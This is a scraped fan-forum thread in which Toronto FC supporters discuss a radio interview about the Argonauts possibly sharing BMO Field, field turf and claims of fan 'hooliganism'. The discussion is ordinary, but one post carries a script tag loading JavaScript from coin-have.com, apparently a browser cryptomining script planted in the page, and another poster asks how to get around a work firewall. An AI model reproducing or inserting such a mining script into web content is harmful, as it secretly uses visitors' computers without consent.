Page 1 of 2 12 LastLast
    RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Talking about the Argos @ BMO

http://www.fan590.com/
    Last edited by Bluenose13; 08-06-2008 at 09:56 AM.

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Rudi did a great job putting Toth in his place & keeping it respectful........Good interview,well done Rudi.
    RPB Road Warrior. DC United 9/29/07, Columbus Chaos 3/25/08, DC Rumble 5/24/08, Montreal Madness 5/27/08, Chicago 7/12/08, Kansas City Opener 3/21/09, Columbus Smoke 3/28/09, Boston Bus Bounce 8/1/09, Montreal 1000 4/7/12 Montreal 3200 3/16/2013 Columbus Bus Breakdown 3/21/15, Montreal Playoffs 10/29/15, Montreal Opener 04/23/16, Montreal East Final 11/22/16, Chicago 08/19/17, NY Semi-Final 10/30/17, Columbus East Final 11/21/17, Montreal "Dichio Lives" 3/17/18

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

so its over?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Better be a telephone interview or they can kiss any green carpeting in the building goodbye.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

DAMN FIREWALL!

I can't do streaming at work.

If anyone knows how to get around a firewall...let me know.

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

^^It's done, hopefully they will archive it so all can hear it.

Toth said he was being tounge & cheek about the "drunk fans with fake british accent" comment.

He said he recieved tons of hate emails swearing at him.
    RPB Road Warrior. DC United 9/29/07, Columbus Chaos 3/25/08, DC Rumble 5/24/08, Montreal Madness 5/27/08, Chicago 7/12/08, Kansas City Opener 3/21/09, Columbus Smoke 3/28/09, Boston Bus Bounce 8/1/09, Montreal 1000 4/7/12 Montreal 3200 3/16/2013 Columbus Bus Breakdown 3/21/15, Montreal Playoffs 10/29/15, Montreal Opener 04/23/16, Montreal East Final 11/22/16, Chicago 08/19/17, NY Semi-Final 10/30/17, Columbus East Final 11/21/17, Montreal "Dichio Lives" 3/17/18

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Did anyone record it ... or do they post it later today?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

so what was said? Recap pls

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Bluenose13 View Post
    Toth said he was being tounge & cheek about the "drunk fans with fake british accent" comment.

He said he recieved tons of hate emails swearing at him.
    classy.

And of course he was being facetious. Ill bet when he said the 'drunk fans with fake accents' line he was putting on his 'well when I was a kid...' voice.

I doubt this experience has turned him onto soccer anymore at all.

Im also wary of the Fan giving the SG's a public medium to get whatever their message may be across. I dont like having a 'representative of Toronto FC fans' speaking for everyone.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ilikemusic View Post
    classy.

And of course he was being facetious. Ill bet when he said the 'drunk fans with fake accents' line he was putting on his 'well when I was a kid...' voice.

Im also wary of the Fan giving the SG's a public medium to get whatever their message may be across. I dont like having a 'representative of Toronto FC fans' speaking for everyone.
    said person would represent said Sg...not fans...
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Was anything going to?

Somebody has to speak up. Who do you propose it be? Jack does it at times. Mike did it last year. And Rudi has always spoken on behalf of Usector. Pedro does it for NEE. And all in all, these guys have always represented the SG interests well. I certainly don't see a problem. It's not like we still don't have a voice...emails and comments always get through from the individuals. But at times you need one voice that represents a group of people.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

classy.

So do you rather suggest the Fan has 2000 TFC supporters on air to have each voice heard individually?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

As far as I'm concerned, Rudi and I (and many many others) share the same opinion on the subject, and I wouldn't feel misrepresented if he was speaking on my behalf.
    ///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Sexcellent! Thanks Carter. *tips hat*

olegunnar

Quote Originally Posted by br_aguilar View Post
    said person would represent said Sg...not fans...
    Exactly

There's a difference between supporter and fan. You want to be a fan? Great, call your ticket rep with your complaints and be an army of one.

As president of a supporter's group he's entitled to be the spokesperson for his group.

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Parkdale View Post
    As far as I'm concerned, Rudi and I (and many many others) share the same opinion on the subject, and I wouldn't feel misrepresented if he was speaking on my behalf.
    Yeah I agree & he stayed composed all the way through the interview & represented Usector & all supporters with class.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Anyone else notice Toth quoting himself on the throwing beer and fake accents bit a number of times?
    He seems to think himself quite clever.
    Douche.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Just heard the interview and I think Rudi did a fine job. Mike Toth was backtracking a little for sure especially in that he referred to chants as "hate songs" in his original tirade (correct me if i'm wrong) and during this interview he said "fight songs". Bit of a difference....

Also, I would have mentioned and explained behaviour at BMO by stating that in any area with 20,000 people, you are going to have idiots.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Stryker View Post
    Sexcellent! Thanks Carter. *tips hat*
    Is that a GWAR reference???

RPB Member
    Past President

Mentioned
    3 Post(s)
    Tagged
    1 Thread(s)

Funny...they called me too, but I couldn't make it due to work.

Good thing Rudi was able to go to give a voice to supporters.
    Toronto FC baby...best team everrrrrrrrrr -Jozy

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I wish Rudi would have made it clear that this was not an anti-Argos position on the part of the supporters but a desire to keep BMO Field soccer-specific.

As for answering the part about using the tax-funded field, Toth is COMPLETELY overlooking the fact that when the field is not being used by TFC, it is being used by the community. Hence the desire of the city to keep the Field Turf so that the citizens continue to use it in the summer and winter. Otherwise, we would have been using grass this whole time. So that answers the whole "it's paid by the tax-payers" issue since it is the tax-payers that are using it!!!

RPB Member
    Past President

Mentioned
    3 Post(s)
    Tagged
    1 Thread(s)

Sometimes you don't get to say everything you want. The interviewers are really good at directing you with their questions.
    Toronto FC baby...best team everrrrrrrrrr -Jozy

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I know...the dude got all of 5 seconds to answer each question. Probably a total of 30 seconds in all.

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

^ are you KIDDING me?! mccown respects nobody but himself. i know someone who works at the rogers studio (produces for the fan, chfi, etc) and said mccown actually lets it be known for other employees not to approach him if they were to say, see him walking in the halls.

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Well done, Rudi.

Toth's voice is really annoying...
    RWN - SoctoberFest! Champion '11, TFC Supporters Cup Champs '10, Indoor Champs '10 & '09, Niagara Cup Champs '09 & '08.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Although I enjoy Prime Time and McCown it is quite evident that he is not super out-going and friendly. This is by his own admission and by the constant "joking" of co-hosts etc of "Lord McCown".

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

The co-founder of one of TFC's most prominent cheering sections joins The Bullpen to contend with Toth's opinions on BMO Field's capabilities as a multi-use facility, and discusses the so-called "hooliganism" at the stadium.

- I love how they call it a cheering section.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Jack View Post
    Sometimes you don't get to say everything you want. The interviewers are really good at directing you with their questions.
    I've been on radio interviews before, and they are kind of surreal and nerve-racking if you don't do them regularly. All interviewers have done a great job of keeping composure and communicating.

I do strongly think that supporters leaders need to get together and /or communicate to get the issued distinctly listed and create a FAQ if you will, so that major issues / answers flow off the tongue.

In the past two instances of interviews, I was a little disappointed that the issue of BMO probably never getting real grass if the CFL moves in, was never brought up. So far, what's been presented to the media is almost that, we just wouldn't like it and it will hurt our pride. We need a list of specific, tangible issues and have them on the ready to answer to anyone, like Rudi mentioned lines on the pitch. Example:

- Will most likely have football lines on pitch. Looks very amertuerish. Bad for TV ratings. How would the CFL fans like soccer lines on their pitch
    - Will probably never get real grass if CFL plays at BMO
    - Canadian Men's National Team doesn't want to play here because of field turf
    - We've lost a lot of potential players because of field turf
    - MLS have said they are against it... Soccer specific was a requirement. Will we lose ability to hold MLS final before 2012 as planned
    - Others....

Since we don't have a professional PR person, we need to have points 1, 2, 3, 4 etc.. in order of importance, and have them at the ready.

My 2¢.

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

i thought rudi did quite well, especially considering what jack said about the host (2 in this case) directing the flow of the conversation.